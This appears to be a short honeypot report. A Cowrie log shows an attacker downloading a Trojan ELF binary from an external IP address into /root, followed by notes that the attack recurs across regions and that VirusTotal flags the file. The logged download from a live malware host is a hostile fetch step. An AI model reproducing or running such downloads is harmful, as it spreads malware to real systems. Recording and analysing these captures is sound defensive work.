http://198.1.188.73:81/ys808e
Connecting to 198.1.188.73:81... connected.
HTTP request sent, awaiting response... 200 OK
Length: 625867 (611K) [text/plain; charset=UTF-8]
Saving to: `/root/ys808e'
100%[======================================>] 625,867 93K/s eta 6s
2017-08-03 11:11:36 (93 KB/s) - `/root/ys808e' saved [625867/625867]

$ pwd
/opt/cowrie/dl
$ file 02ab39d5ef83ffd09e3774a67b783bfa345505d3cb86694c5b0f0c94980e5ae8
02ab39d5ef83ffd09e3774a67b783bfa345505d3cb86694c5b0f0c94980e5ae8: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped

• The same kind of attack arrives regardless of region (San Francisco, London, Singapore)
• Checking on virustotal (https://www.virustotal.com/ja/) shows that the retrieved file is a Trojan horse